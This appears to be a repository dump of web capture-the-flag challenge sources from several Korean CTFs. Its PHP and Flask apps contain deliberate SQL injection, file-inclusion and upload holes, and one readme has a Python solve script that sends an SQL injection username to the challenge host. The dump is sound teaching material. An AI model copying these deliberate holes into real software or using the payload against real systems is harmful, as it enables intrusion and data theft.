-------------------------------------------------------------------------------- /2018/hackingcamp18/readme.md: -------------------------------------------------------------------------------- 1 | # Pretty Shop (Hackingcamp 18) 2 | 3 | ``` 4 | 문제명 (Challenge name) : Pretty shop 5 | 출제자 (Author) : 문시우 6 | 난이도 (Difficulty) : Easy 7 | ``` 8 | 9 | ### 문제 셋팅 (Settings) 10 | 11 | 환경 : `apache2, php7.2.7, sqlite3` 12 | 13 | 1. apache2 설치하고 mod_rewrite 모듈 로드 14 | $ sudo rewrite.load ../mods-enabled/ 15 | 16 | 2. apache2.conf에서 .htaccess 인식하도록 설정 17 | AllowOverride를 None에서 All로 바꿔주면 됨 18 | 19 | 3. sqlite3 설치 및 php-sqlite3 모듈 활성화 20 | $ sudo apt-get install sqlite3 21 | $ sudo apt-get install php-sqlite3 22 | $ /etc/php/7.x/apache2/php.ini 에서 ;extension=php_sqlite3.dll 앞에있는 ; 지우기 23 | 24 | 25 | ### 취약점 개요 (Vulnerability) 26 | 27 | Concept : Indirect sql injection in sqlite3 28 | 29 | `/classes/Shop.class.php` 에서 취약점 발생 30 | line 42 : `$user = $this->get_user_information($_SESSION['username']);` 31 | `get_user_information` 메소드로 `$_SESSION['username']`를 그대로 넘겨주고 있다. 32 | 33 | 34 | ### 풀이 방법 (How to exploit) 35 | 36 | ```python 37 | from requests import post 38 | # pretty shop write up 39 | 40 | def main() : 41 | username = "username=-1'/**/and/**/0/**/or/**/username='admi'||'n';--" 42 | data = {"username": username, "password": "12345"} 43 | r = post('http://layer7.kr:6005/register', data=data) 44 | 45 | r = post('http://layer7.kr:6005/login', data=data) 46 | cookies = {'PHPSESSID':r.cookies['PHPSESSID']} 47 | 48 | get_flag = post('http://layer7.kr:6005/buy', data={'item':'flag'}, cookies=cookies) 49 | print(get_flag.text) 50 | 51 | if __name__ == '__main__' : 52 | main() 53 | ``` 54 | -------------------------------------------------------------------------------- /2018/hackingcamp18/www.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2018/hackingcamp18/www.zip -------------------------------------------------------------------------------- /2019/Belluminar/.htaccess: -------------------------------------------------------------------------------- 1 | RewriteEngine on 2 | RewriteRule "^(.*)$" "index.php" [QSA,NC,L] -------------------------------------------------------------------------------- /2019/Belluminar/classes/AlephDB/@Aleph.class.php: -------------------------------------------------------------------------------- 1 | host = __DB_HOST__; 7 | $this->port = __DB_PORT__; 8 | } 9 | 10 | private function encrypt_data($data) { 11 | $split_data = str_split($data); 12 | $retval = ''; 13 | 14 | foreach($split_data as $str) 15 | $retval .= $str ^ "\x01"; 16 | 17 | return $retval; 18 | } 19 | 20 | private function make_query($command, $data) { 21 | if($command == 'INSERT') 22 | $header = "\x01"; 23 | else if ($command == 'SELECT') 24 | $header = "\x02"; 25 | else if($command == 'DELETE') 26 | $header = "\x03"; 27 | 28 | $condition = json_decode($data, true); // json to array 29 | $send_data = $header; 30 | 31 | foreach ($condition as $key=>$val) { 32 | $val = $this->encrypt_data($val); 33 | $send_data .= "{$key}\xff{$val}\xff\x02"; 34 | } 35 | 36 | $send_data = substr($send_data, 0, -1)."\x01"; // End 37 | return $send_data; 38 | } 39 | 40 | private function select($data, $conn) { 41 | $query = $this->make_query('SELECT', $data); 42 | socket_send($conn, $query, strlen($query), MSG_EOF); 43 | $select_data = ""; 44 | 45 | while(($read_data = socket_read($conn, 4096)) !== "") { 46 | $select_data .= $read_data; 47 | } 48 | 49 | $retval = json_decode($select_data, true); 50 | return $retval; 51 | } 52 | 53 | private function insert($data, $conn) { 54 | $query = $this->make_query('INSERT',$data); 55 | socket_send($conn, $query, strlen($query), MSG_EOF); 56 | 57 | return true; 58 | } 59 | 60 | private function delete($data, $conn) { 61 | $query = $this->make_query('DELETE', $data); 62 | socket_send($conn, $query, strlen($query), MSG_EOF); 63 | 64 | return true; 65 | } 66 | 67 | public function query($command, $data) { 68 | $conn = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); 69 | socket_connect($conn, $this->host, $this->port); 70 | 71 | if(is_array($data)) $data = json_encode($data); 72 | switch(strtoupper($command)) { 73 | case 'SELECT' : 74 | $retval = $this->select($data, $conn); 75 | break; 76 | case 'INSERT' : 77 | $retval = $this->insert($data, $conn); 78 | break; 79 | case 'DELETE' : 80 | $retval = $this->delete($data, $conn); 81 | break; 82 | default : 83 | $retval = false; 84 | } 85 | 86 | socket_close($conn); 87 | return $retval; 88 | } 89 | } 90 | -------------------------------------------------------------------------------- /2019/Belluminar/classes/AlephDB/Aleph.class.php: -------------------------------------------------------------------------------- 1 | query('SELECT', ['table' => 'videos']); 14 | return $retval; 15 | } 16 | 17 | public function get_user_info() { 18 | $user = $this->query('SELECT', ['table' => 'users', 'username' => $_SESSION['username']])[0]; 19 | return $user; 20 | } 21 | 22 | } 23 | -------------------------------------------------------------------------------- /2019/Belluminar/config/.htaccess: -------------------------------------------------------------------------------- 1 | Order deny, allow 2 | Deny from all -------------------------------------------------------------------------------- /2019/Belluminar/config/config.php: -------------------------------------------------------------------------------- 1 | '/', 17 | 'Videos' => '/videos', 18 | 'Upload' => '/upload', 19 | 'Mypage' => '/mypage', 20 | 'Logout' => '/logout', 21 | ]); 22 | 23 | define('__GUEST_MENU__', [ 24 | 'Main' => '/', 25 | 'Videos' => '/videos', 26 | 'Login' => '/login', 27 | 'Register' => '/register', 28 | ]); 29 | -------------------------------------------------------------------------------- /2019/Belluminar/config/function.php: -------------------------------------------------------------------------------- 1 | location.href=\"{$url}\";"; 4 | $execute .= strlen($msg) ? 'alert("'.addslashes($msg).'");' : ''; 5 | $execute .= ''; die($execute); 6 | } 7 | 8 | function backward_url($msg="") { 9 | $execute = ''; die($execute); 12 | } 13 | 14 | function process_password($password) { 15 | return md5(hash('sha256', sha1(md5($password).__SALT__))); 16 | } 17 | 18 | function strtolower_callback($argv) { 19 | return strtolower("\x{$argv[1]}"); 20 | } 21 | 22 | function escape_for_json($argv) { 23 | $argv = urlencode($argv); 24 | return preg_replace_callback('/\%(.{2})/', 'strtolower_callback', $argv); 25 | } -------------------------------------------------------------------------------- /2019/Belluminar/config/server: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2019/Belluminar/config/server -------------------------------------------------------------------------------- /2019/Belluminar/index.php: -------------------------------------------------------------------------------- 1 | 3 | -------------------------------------------------------------------------------- /2019/Belluminar/templates/header.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | @var(__TITLE__) 6 | 7 | 8 | 9 | 10 | 11 |
12 | @mun foreach($top_menu as $menu=>$url) 13 | @var($menu)  14 | @endforeach 15 | -------------------------------------------------------------------------------- /2019/Belluminar/templates/index.html: -------------------------------------------------------------------------------- 1 |

Main

2 |
3 | 4 | @var($msg)
5 |
6 | AlephpHub is a video sharing site.
7 | Anyone can watch the video, however uploads are limited to prevent spam.
8 | You can upload videos if you achieve attendance of 100 or more.
9 |
10 | Thank you! 11 | 12 | -------------------------------------------------------------------------------- /2019/Belluminar/templates/login.html: -------------------------------------------------------------------------------- 1 | 22 | 23 |

Login

24 | 29 | -------------------------------------------------------------------------------- /2019/Belluminar/templates/mypage.html: -------------------------------------------------------------------------------- 1 | 27 | 28 |

Mypage

29 |

30 | Username : @var($username)
31 | Joined date : @var($joined)
32 | Attendance : @var($attendance)
33 | Premium : @var($is_premium)
34 |

35 | 36 | 37 | -------------------------------------------------------------------------------- /2019/Belluminar/templates/read.html: -------------------------------------------------------------------------------- 1 | 14 | 15 | @mun if($is_writer) 16 |
17 | 18 | @endif 19 | 20 |

@var($title)

21 |

22 | Writer : @var($writer)
23 | Video url : https://www.youtube.com/watch?v=@var($video['video_id'])
24 | Video length : @var($video['video_length'])s 25 |

26 | 27 |

@var(nl2br($contents))

-------------------------------------------------------------------------------- /2019/Belluminar/templates/register.html: -------------------------------------------------------------------------------- 1 | 22 | 23 |

Register

24 |
25 |
26 | 27 | 28 |
29 |
-------------------------------------------------------------------------------- /2019/Belluminar/templates/upload.html: -------------------------------------------------------------------------------- 1 | 22 | 23 |

Upload (share)

24 | 25 |
26 |
27 |
28 |
29 | Example : https://www.youtube.com/watch?v=FcyU-GTrLlI

30 | 31 |
32 | 33 |
-------------------------------------------------------------------------------- /2019/Belluminar/templates/videos.html: -------------------------------------------------------------------------------- 1 |

Videos

2 | @mun foreach($videos as $video) 3 | 4 | 5 | 6 | @endforeach -------------------------------------------------------------------------------- /2019/Christmas_CTF/Dynamic_SQL/mild_taste(unintended)/config.php: -------------------------------------------------------------------------------- 1 | false, 'message' => 'Failed.']; 13 | 14 | $sql = "select * from {$table} where {$column['id']}='{$id}' and {$column['pw']}='{$pw}';"; 15 | if(!$result = $db->query($sql)) { 16 | $retval['message'] = 'query error'; 17 | die(json_encode($retval)); 18 | } 19 | 20 | if($fetch = $result->fetch_array(MYSQLI_NUM)) { 21 | $retval['result'] = true; 22 | $retval['message'] = "Hello, {$fetch[0]}\n"; 23 | 24 | if($fetch[0] == 'admin') 25 | $retval['message'] .= 'Can you read my note? zz'; 26 | else 27 | $retval['message'] .= "Note : {$fetch[2]}"; 28 | } 29 | 30 | clean_structure($db, $origin); 31 | echo json_encode($retval); -------------------------------------------------------------------------------- /2019/Christmas_CTF/Dynamic_SQL/mild_taste(unintended)/source.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2019/Christmas_CTF/Dynamic_SQL/mild_taste(unintended)/source.zip -------------------------------------------------------------------------------- /2019/Christmas_CTF/Dynamic_SQL/mild_taste(unintended)/static/favicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2019/Christmas_CTF/Dynamic_SQL/mild_taste(unintended)/static/favicon.png -------------------------------------------------------------------------------- /2019/Christmas_CTF/Dynamic_SQL/mild_taste(unintended)/static/pig.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2019/Christmas_CTF/Dynamic_SQL/mild_taste(unintended)/static/pig.png -------------------------------------------------------------------------------- /2019/Christmas_CTF/Dynamic_SQL/mild_taste(unintended)/static/style.css: -------------------------------------------------------------------------------- 1 | body { 2 | background-color: #eeeeee; 3 | } 4 | 5 | .login-form input:not([type="radio"]), .login-form select { 6 | width: 100%; 7 | height: 50px; 8 | padding: 10px 20px 10px 20px; 9 | margin-bottom: 3px; 10 | border: #e0e0e0 0.5px solid; 11 | font-size: 15px; 12 | outline: none; 13 | } -------------------------------------------------------------------------------- /2019/Christmas_CTF/Dynamic_SQL/spicy_taste/config.php: -------------------------------------------------------------------------------- 1 | false, 'message' => 'Failed.']; 13 | 14 | $sql = "select * from {$table} where {$column['id']}='{$id}' and {$column['pw']}='{$pw}';"; 15 | if(!$result = $db->query($sql)) { 16 | $retval['message'] = 'query error'; 17 | die(json_encode($retval)); 18 | } 19 | 20 | if($fetch = $result->fetch_array(MYSQLI_NUM)) { 21 | $retval['result'] = true; 22 | $retval['message'] = "Hello, {$fetch[0]}\n"; 23 | 24 | if($fetch[0] == 'admin') 25 | $retval['message'] .= 'Can you read my note? zz'; 26 | else 27 | $retval['message'] .= "Note : {$fetch[2]}"; 28 | } 29 | 30 | clean_structure($db, $origin); 31 | echo json_encode($retval); -------------------------------------------------------------------------------- /2019/Christmas_CTF/Dynamic_SQL/spicy_taste/source.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2019/Christmas_CTF/Dynamic_SQL/spicy_taste/source.zip -------------------------------------------------------------------------------- /2019/Christmas_CTF/Dynamic_SQL/spicy_taste/static/favicon.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2019/Christmas_CTF/Dynamic_SQL/spicy_taste/static/favicon.png -------------------------------------------------------------------------------- /2019/Christmas_CTF/Dynamic_SQL/spicy_taste/static/pig.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2019/Christmas_CTF/Dynamic_SQL/spicy_taste/static/pig.png -------------------------------------------------------------------------------- /2019/Christmas_CTF/Dynamic_SQL/spicy_taste/static/style.css: -------------------------------------------------------------------------------- 1 | body { 2 | background-color: #eeeeee; 3 | } 4 | 5 | .login-form input:not([type="radio"]), .login-form select { 6 | width: 100%; 7 | height: 50px; 8 | padding: 10px 20px 10px 20px; 9 | margin-bottom: 3px; 10 | border: #e0e0e0 0.5px solid; 11 | font-size: 15px; 12 | outline: none; 13 | } -------------------------------------------------------------------------------- /2019/Sunrin_Internet_High_School_CTF_2019/README.md: -------------------------------------------------------------------------------- 1 | # 2019 Sunrin Internet High School CTF 2 | 3 | `All prob were made by munsiwoo.` 4 | ``` 5 | jjang9 – http://httpd.shop:23905 6 | My first app – http://httpd.shop:23906 (소스코드는 깃허브에서 확인) 7 | Last old school – http://httpd.shop/last_old_school/ 8 | ``` 9 | 10 | 11 | 12 | * jjang9 (Web, PHP) 13 | * White box 14 | * PHP file system function trick 15 | * PHP Latest release version open_basedir bypass 16 | * Lfi to RCE 17 | * My first app (Web, Flask) 18 | * White box 19 | * Blind CSS Injection 20 | * Last old school (Web, PHP) 21 | * White box 22 | * Error Based SQL Injection 23 | 24 | 25 | ``` 26 | You can contact me via [mun.xiwoo@gmail.com] 27 | ``` 28 | -------------------------------------------------------------------------------- /2019/Sunrin_Internet_High_School_CTF_2019/jjang9/0.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2019/Sunrin_Internet_High_School_CTF_2019/jjang9/0.png -------------------------------------------------------------------------------- /2019/Sunrin_Internet_High_School_CTF_2019/jjang9/README.md: -------------------------------------------------------------------------------- 1 | # jjang9 php.ini 2 | 3 | ``` 4 | open_basedir = /var/www:/tmp 5 | ``` 6 | 7 | ``` 8 | disable_functions = pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,system,exec,shell_exec,passthru,mail,symlink,imap_open,popen,unlink,rmdir,mkdir,rename 9 | ``` 10 | -------------------------------------------------------------------------------- /2019/Sunrin_Internet_High_School_CTF_2019/jjang9/index.html: -------------------------------------------------------------------------------- 1 |
2 | 
3 | flag is in the /flag
4 | 
5 | * lfi.php
6 | * upload.php
7 | 


--------------------------------------------------------------------------------
/2019/Sunrin_Internet_High_School_CTF_2019/jjang9/lfi.php:
--------------------------------------------------------------------------------
 1 | alert("upload ok");location.href="'.$filename.'";');
18 | 	}
19 | 
20 | 	else {
21 | 		die('');
22 | 	}
23 | }
24 | ?>
25 | 
26 | 
27 | 
28 | 	
29 | 
30 | 
31 | 	

32 | 		
33 | 		
34 | 	

35 | 	

36 | 	source
37 | 
38 | 
39 | 
40 | 
41 | 


--------------------------------------------------------------------------------
/2019/Sunrin_Internet_High_School_CTF_2019/last_old_school/config.php:
--------------------------------------------------------------------------------
 1 | query : {$query}
";
16 | 
17 | $_GET['pw'] = addslashes($_GET['pw']);
18 | $query = "select pw from user where id='admin' and pw='{$_GET['pw']}';";
19 | $fetch = mysqli_fetch_assoc(mysqli_query($conn, $query));
20 | 
21 | if($fetch['pw'] === $_GET['pw']) { // Do you know the password for admin?
22 | 	die("
{$FLAG}
");
23 | }
24 | 
25 | show_source(__FILE__);
26 | 
27 | 


--------------------------------------------------------------------------------
/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/config.py:
--------------------------------------------------------------------------------
 1 | import sqlite3
 2 | 
 3 | def connect_db() :
 4 | 	conn = sqlite3.connect('mydb.db')
 5 | 	return conn
 6 | 
 7 | def dict_factory(cursor, row):
 8 | 	result = {}
 9 | 	for idx, col in enumerate(cursor.description):
10 | 		result[col[0]] = row[idx]
11 | 	return result
12 | 


--------------------------------------------------------------------------------
/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/mydb.db:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/mydb.db


--------------------------------------------------------------------------------
/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/static/eye.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/static/eye.png


--------------------------------------------------------------------------------
/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/static/mommyhand.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/static/mommyhand.png


--------------------------------------------------------------------------------
/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/static/munsiu.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/static/munsiu.png


--------------------------------------------------------------------------------
/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/static/peach.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/static/peach.png


--------------------------------------------------------------------------------
/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/static/sibariza.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/static/sibariza.png


--------------------------------------------------------------------------------
/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/templates/board.html:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 | 	
 5 | 	Board
 6 | 	
18 | 
19 | 
20 | 
Board

21 | 
22 | 
23 | 

24 | 
25 | 	
26 | 		
27 | 		
28 | 		
29 | 		
30 | 	
31 | 	
32 | 	{% for post in post_list %}
33 | 	
34 | 		
35 | 		
36 | 		
37 | 		
38 | 	
39 | 	{% endfor %}
40 | 
41 | 
PidTitleUsernameAvatar
{{post['pid']}}{{post['title']}}{{post['username']}}

42 | 
43 | 
44 | 
45 | 


--------------------------------------------------------------------------------
/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/templates/home.html:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 	
 4 | 	Home
 5 | 
 6 | 
 7 | 
Home

 8 | 
 9 | 
10 | 

11 | 
12 | {% if 'username' in session %}
13 | 
14 | Hello, {{session['username']}}  

15 | 
16 | you can see your profile here.
17 | you can use the free board here.
18 | you can report a post here.
19 | you can do logout here.
20 | 

21 | 
22 | {% else %}
23 | 
24 | Welcome, you can login here.

25 | If you want to register, you can do it here.
26 | 
27 | {% endif %}
28 | 
29 | 
30 | 


--------------------------------------------------------------------------------
/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/templates/login.html:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 | 	
 5 | 	Login
 6 | 
 7 | 
 8 | 
Login

 9 | 
10 | 

11 | 	

12 | 	
13 | 	
14 | 

15 | 
16 | {% with messages = get_flashed_messages() %}
17 | 	{% if messages %}
18 | 		{% for message in messages %}
19 | 		{{ message }}
20 | 		{% endfor %}
21 | 	{% endif %}
22 | {% endwith %}
23 | 
24 | 
25 | 
26 | 


--------------------------------------------------------------------------------
/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/templates/profile.html:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 | 	
 5 | 	Profile
 6 | 
 7 | 	
25 | 
26 | 
27 | 
28 | 
38 | 
39 | 
Hello, {{user['username']}}

40 | 

41 | 

42 | User ID : {{user['uid']}}

43 | Comment : {{user['comment']}}
44 | 

45 | Your avatar

46 | 

47 | 

48 | 

49 | 	You can choose avatar.

50 | 	1. munsiu

51 | 	2. mommyhand

52 | 	3. peach

53 | 

54 | 

55 | 

56 | 

57 | 

58 | 
59 | Password : 
60 | 
61 | 

62 | Press the "Save change" button If you want to apply avatar or change password.
63 | 

64 | 
65 | 

66 | 

67 | 

68 | {% with messages = get_flashed_messages() %}
69 | 	{% if messages %}
70 | 		{% for message in messages %}
71 | 		{{ message }}
72 | 		{% endfor %}
73 | 	{% endif %}
74 | {% endwith %}
75 | 
76 | 
77 | 
78 | 


--------------------------------------------------------------------------------
/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/templates/read.html:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 | 	
 5 | 	{{post['title']}}
 6 | 	
12 | 
13 | 
14 | 
Read post

15 | Title : {{post['title']}}

16 | Username : {{post['username']}}
17 | 

18 | Contents
19 | 
20 | {{post['contents']}}
21 | 

22 | 

23 | 
24 | 
25 | 
26 | 


--------------------------------------------------------------------------------
/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/templates/register.html:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 | 	
 5 | 	Register
 6 | 
 7 | 
 8 | 
Register

 9 | 
10 | 

11 | 	

12 | 	

13 | 	
14 | 	
15 | 

16 | 
17 | {% with messages = get_flashed_messages() %}
18 | 	{% if messages %}
19 | 		{% for message in messages %}
20 | 		{{ message }}
21 | 		{% endfor %}
22 | 	{% endif %}
23 | {% endwith %}
24 | 
25 | 
26 | 
27 | 


--------------------------------------------------------------------------------
/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/templates/report.html:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 | 	
 5 | 	Report
 6 | 	
12 | 
13 | 
14 | 
Report

15 | You can report a post by sending a post URL to admin.
16 | 


17 | 

18 | 	Post URL : 
19 | 	
20 | 	

21 | 	Example) http://httpd.shop:23906/read/1
22 | 

23 | 
24 | 

25 | 
26 | 

27 | 

28 | 
29 | {% with messages = get_flashed_messages() %}
30 | 	{% if messages %}
31 | 		{% for message in messages %}
32 | 		{{ message }}
33 | 		{% endfor %}
34 | 	{% endif %}
35 | {% endwith %}
36 | 
37 | 
38 | 
39 | 


--------------------------------------------------------------------------------
/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/app/templates/write.html:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 	
 4 | 	Write
 5 | 	
18 | 
19 | 
20 | 
21 | 
Write

22 | 
23 | 

24 | 	

25 | 	

26 | 	
27 | 

28 | 
29 | {% with messages = get_flashed_messages() %}
30 | 	{% if messages %}
31 | 		{% for message in messages %}
32 | 		{{ message }}
33 | 		{% endfor %}
34 | 	{% endif %}
35 | {% endwith %}
36 | 
37 | 
38 | 
39 | 


--------------------------------------------------------------------------------
/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/chromedriver:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/munsiwoo/ctf-web-prob/eb4124d4208ef7a8c28c7e16a41b5cfa7bcd86a5/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/chromedriver


--------------------------------------------------------------------------------
/2019/Sunrin_Internet_High_School_CTF_2019/my_first_app/robot.py:
--------------------------------------------------------------------------------
 1 | from selenium import webdriver
 2 | from selenium.webdriver.chrome.options import Options
 3 | from selenium.common.exceptions import TimeoutException
 4 | 
 5 | import time, sqlite3
 6 | # admin robot selenium
 7 | # made by munsiwoo
 8 | 
 9 | def driver_init() :
10 | 	global driver
11 | 
12 | 	chrome_options = Options()
13 | 	chrome_options.add_argument('--no-sandbox')
14 | 	chrome_options.add_argument('--window-size=1420,1080')
15 | 	chrome_options.add_argument('--headless')
16 | 	chrome_options.add_argument('--disable-gpu')
17 | 
18 | 	driver = webdriver.Chrome(executable_path='/home/chromedriver', chrome_options=chrome_options)
19 | 	driver.implicitly_wait(3)
20 | 	driver.set_page_load_timeout(3)
21 | 
22 | def dict_factory(cursor, row):
23 | 	result = {}
24 | 	for idx, col in enumerate(cursor.description):
25 | 		result[col[0]] = row[idx]
26 | 	return result
27 | 
28 | 
29 | def set_admin_password() :
30 | 	global conn
31 | 	c = conn.cursor()
32 | 
33 | 	query = "update users set password=? where username='admin'"
34 | 	c.execute(query, (admin_password, ))
35 | 	conn.commit()
36 | 
37 | 	return True
38 | 
39 | def get_report_url() :
40 | 	global conn
41 | 	conn.row_factory = dict_factory
42 | 	c = conn.cursor()
43 | 
44 | 	query = 'select * from report order by rid limit 1'
45 | 	c.execute(query)
46 | 	fetch = c.fetchone()
47 | 
48 | 	if fetch :
49 | 		rid = fetch['rid']
50 | 		c.execute('delete from report where rid={}'.format(rid))
51 | 		conn.commit()
52 | 
53 | 		return fetch['url']
54 | 	
55 | 	return False
56 | 
57 | 
58 | if __name__ == '__main__' :
59 | 
60 | 	conn = sqlite3.connect('/home/prob/mydb.db')
61 | 	admin_password = 'b3a51a'
62 | 	driver_init()
63 | 
64 | 	while True :
65 | 		try :
66 | 			report_url = get_report_url()
67 | 			if report_url :
68 | 				driver.get('http://httpd.shop:23906/profile')
69 | 
70 | 				if driver.current_url == 'http://httpd.shop:23906/login' :
71 | 					set_admin_password()
72 | 					driver.execute_script("document.querySelector('[name=\"username\"]').value = 'admin'")
73 | 					driver.execute_script("document.querySelector('[name=\"password\"]').value = '{}'".format(admin_password))
74 | 					time.sleep(0.5)
75 | 					driver.execute_script("document.querySelector('[type=\"submit\"]').click()")
76 | 					time.sleep(1)
77 | 
78 | 				driver.get(report_url)
79 | 				print('next', flush=True)
80 | 		
81 | 			else :
82 | 				time.sleep(1)
83 | 
84 | 		except :
85 | 			driver.quit()
86 | 			driver = None
87 | 			driver_init()
88 | 


--------------------------------------------------------------------------------
/2019/rename/backup/index.html:
--------------------------------------------------------------------------------
1 | blind


--------------------------------------------------------------------------------
/2019/rename/index.php:
--------------------------------------------------------------------------------
 1 | 
Image preview service

 2 | 
Upload your file!

 3 | 

 4 | 
 5 | 
 6 | 

 7 | 

 8 | 
this web application is open source!

 9 | upload.php source

10 | 


--------------------------------------------------------------------------------
/2019/rename/upload.php:
--------------------------------------------------------------------------------
 1 | Preview your uploaded file ({$size[0]}x{$size[1]})

"; 44 | echo ''; 45 | } 46 | else { 47 | echo '

backup failed.

'; 48 | } 49 | } 50 | 51 | -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.7.9 2 | 3 | RUN mkdir /service 4 | COPY ./src /service 5 | RUN chmod 777 -R /service 6 | 7 | COPY ./flag /flag 8 | 9 | RUN pip install -r /service/requirements.txt 10 | 11 | EXPOSE 8081 12 | ENTRYPOINT ["python"] 13 | CMD ["/service/app.py"] -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/flag: -------------------------------------------------------------------------------- 1 | LAYER7{XXXXXXXXX} -------------------------------------------------------------------------------- /2021/LAYER7_CTF/handmade/src/htdocs/about.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | About - The Bread Factory Website Template 7 | 8 | 9 | 10 |
11 |
12 | 13 | 20 |
21 |
22 |
23 |
24 |

We Have Free Templates for Everyone

25 |

Our website templates are created with inspiration, checked for quality and originality and meticulously sliced and coded. What's more, they're absolutely free! You can do a lot with them. You can modify them. You can use them to design websites for clients, so long as you agree with the Terms of Use. You can even remove all our links if you want to.

26 |

We Have More Templates for You

27 |

Looking for more templates? Just browse through all our Free Website Templates and find what you're looking for. But if you don't find any website template you can use, you can try our Free Web Design service and tell us all about it. Maybe you're looking for something different, something special. And we love the challenge of doing something different and something special.

28 |

Be Part of Our Community

29 |

If you're experiencing issues and concerns about this website template, join the discussion on our forum and meet other people in the community who share the same interests with you.

30 |

Template details

31 |

Design version 7
Code version 3
Website Template details, discussion and updates for this The Bread Factory Website Template. Website Template design by Free Website Templates. Please feel free to remove some or all the text and links of this page and replace it with your own About content.

32 |
33 |
34 |
35 |
36 |

copyright © footer | all rights reserved.

37 |
38 |
